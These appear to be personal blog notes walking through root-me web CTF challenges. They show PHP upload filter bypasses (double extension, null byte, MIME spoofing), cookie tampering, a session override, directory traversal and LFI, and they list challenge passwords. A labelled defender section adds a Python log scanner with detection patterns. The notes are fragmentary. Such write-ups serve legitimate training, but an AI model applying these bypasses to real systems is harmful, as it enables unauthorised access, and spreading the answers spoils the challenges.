Gallery v0.02
Introduction
Your goal is to hack this photo gallery by uploading PHP code.
Visiting /challenge/web-serveur/ch20/tmp/phpSfAkKz gives nothing
Go back
View source
view-source:http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/ccbde566dbc436aa41b84533bbc60ad8//3.php.jpg?preview
Remove the ?preview part
http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/ccbde566dbc436aa41b84533bbc60ad8//3.php.jpg
PV1OejHY4MxfsC2mHpRz9
Common MIME types (file type, extension, MIME type):
HTML text                .html          text/html
XML document             .xml           text/xml
XHTML document           .xhtml         application/xhtml+xml
Plain text               .txt           text/plain
RTF text                 .rtf           application/rtf
PDF document             .pdf           application/pdf
Microsoft Word file      .word          application/msword
PNG image                .png           image/png
GIF image                .gif           image/gif
JPEG image               .jpeg, .jpg    image/jpeg
AU sound file            .au            audio/basic
MIDI music file          .mid, .midi    audio/midi, audio/x-midi
RealAudio music file     .ra, .ram      audio/x-pn-realaudio
MPEG file                .mpg, .mpeg    video/mpeg
AVI file                 .avi           video/x-msvideo
GZIP file                .gz            application/x-gzip
TAR file                 .tar           application/x-tar
Arbitrary binary data                   application/octet-stream
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: image/gif
View source
Capture the request
Delete
http://challenge01.root-me.org/web-serveur/ch21/galerie/upload/cb13dd644fb605082b0a59f2d15c84e7//2.php
password : UN2YusYPnmwfHFHI5zj3
Bob created a script to gather users' emails...
PS: Bob really loves cookies
ctrl+u
<!--SetCookie("ch7","visiteur");
Enter test
Click Saved email addresses
You need to be admin
Capture the request with Live HTTP Headers
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challenge01.root-me.org/web-serveur/ch7/
Cookie: ch7=visiteur
X-Forwarded-For: 8.8.8.8
Change Cookie: ch7=visiteur to
Cookie: ch7=admin
replay
Refresh
Validation password : ml-SYMPA
Photo gallery v 0.01
Find the hidden section of the photo gallery.
Remove ch15.php
Crawl the directories with Burp
Found ch15/galerie/86hwnX2r/password.txt
Just click it
http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt
kcb$!Bx@v4Gs9Ez
%00 - null-byte truncation
Gallery v0.04
Your goal is to hack this photo gallery by uploading PHP code.
Upload 2.php
Then upload 3.php.jpeg
3.php%00.jpg
This way the system drops the trailing .jpg and parses 3.php directly.
Go back
Click the image just uploaded
Well done ! You can validate this challenge with the password : YPNchi2NmTwygr2dgCCF
Retrieved the administrator password of this application.
PHP filters are used to validate and filter data coming from non-secure sources (such as user input).
Decode
<?php
include("config.php");
if ( isset($_POST["username"]) && isset($_POST["password"]) ){
    if ($_POST["username"]==$username && $_POST["password"]==$password){
        print("
<?php } ?>
include("config.php");
PD9waHAKCiR1c2VybmFtZT0iYWRtaW4iOwokcGFzc3dvcmQ9IkRBUHQ5RDJta3kwQVBBRiI7Cgo/Pg==
<?php
$username="admin";
$password="DAPt9D2mky0APAF";
?>
It seems that the developer often leaves backup files around...
http://challenge01.root-me.org/web-serveur/ch17/index.php?_SESSION[logged]=1
well done, you can validate with the password : NoiQYdpcd5kgNwG
PHP file inclusion vulnerabilities arise when a file is included through a PHP function and the supplied filename is not properly validated, so an unintended file gets processed, which can lead to unexpected file disclosure or even malicious code injection.
Abbreviated LFI
Get in the admin section.
Look at the links of the sub-tabs under each tab
http://challenge01.root-me.org/web-serveur/ch16/?files=reseau&f=index.html
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&f=index.html
http://challenge01.root-me.org/web-serveur/ch16/?files=esprit&f=index.html
Notice that the files variable selects the tab and f selects the sub-tab
So
Directory traversal
http://challenge01.root-me.org/web-serveur/ch16/?files=../&f=index.html
In index.php:
if (isset($_GET["files"])) $files=$_GET["files"];
if (isset($_GET["f"]) && $_GET["f"]!="")
http://challenge01.root-me.org/web-serveur/ch16/?files=../&f=admin/index.php
users = array('admin' => 'OpbNJ60xYpvAQU8');
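A defender-side check, added here as an example that is not from the original write-up or from root-me: a small access-log scanner that flags the request shapes used in these challenges (a double extension such as 3.php.jpg, a %00 null byte in the filename, ../ traversal in the files parameter, and a _SESSION[...] override in the query string). The log lines are constructed samples modelled on the URLs above; the IPs, timestamps and directory names in them are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (common log format), not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /galerie/upload/abc/3.php.jpg?preview HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /galerie/upload/abc/3.php%00.jpg HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /ch16/?files=../&f=admin/index.php HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /ch17/index.php?_SESSION[logged]=1 HTTP/1.1" 200 88
10.0.0.2 - - [01/Jan/2024:10:00:05 +0000] "GET /galerie/upload/abc/holiday.jpg HTTP/1.1" 200 9000
"""

# ip, two "-" fields, [timestamp], then "METHOD path ..."
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)')

# Each rule is checked against the URL-decoded request path.
RULES = [
    # .php (or .php3 etc.) followed by another extension, e.g. 3.php.jpg
    ("double-extension", re.compile(r"\.php\d?\.[a-z0-9]+(?:\?|$)", re.I)),
    # %00 decodes to a real NUL byte
    ("null-byte", re.compile(r"\x00")),
    # ../ at the start of the path or right after a / or = (parameter value)
    ("path-traversal", re.compile(r"(^|[/=])\.\.(/|$)")),
    # query parameter named like a PHP superglobal, e.g. ?_SESSION[logged]=1
    ("superglobal-override", re.compile(r"[?&]_(?:SESSION|GET|POST|COOKIE)\[", re.I)),
]

def classify_path(path):
    """Return the names of the rules that match one request path after URL decoding."""
    decoded = unquote(path)  # %00 -> NUL, %2e%2e -> .., and so on
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Parse log lines and return (ip, raw path, matched rules) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        found = classify_path(m.group("path"))
        if found:
            hits.append((m.group("ip"), m.group("path"), found))
    return hits

if __name__ == "__main__":
    for ip, path, rules in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(rules)}")
```

Decoding before matching matters: a rule written against the raw `%00` text would miss `%2500` or mixed-case encodings that the server itself decodes.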
PHP loose comparison
Get an access.
Authentication source code
$FLAG, $USER and $PASSWORD_SHA256 in secret file
e modifier
Read flag.php
Warning: preg_replace(): Delimiter must not be alphanumeric or backslash in /challenge/web-serveur/ch37/index.php on line 25
The /e modifier makes preg_replace() treat the replacement parameter as PHP code (after the appropriate backreference substitution has been done). Tip: make sure replacement forms a valid PHP code string, otherwise PHP reports a parse error on the line containing preg_replace().
Welcome to my personal blog: joy_nick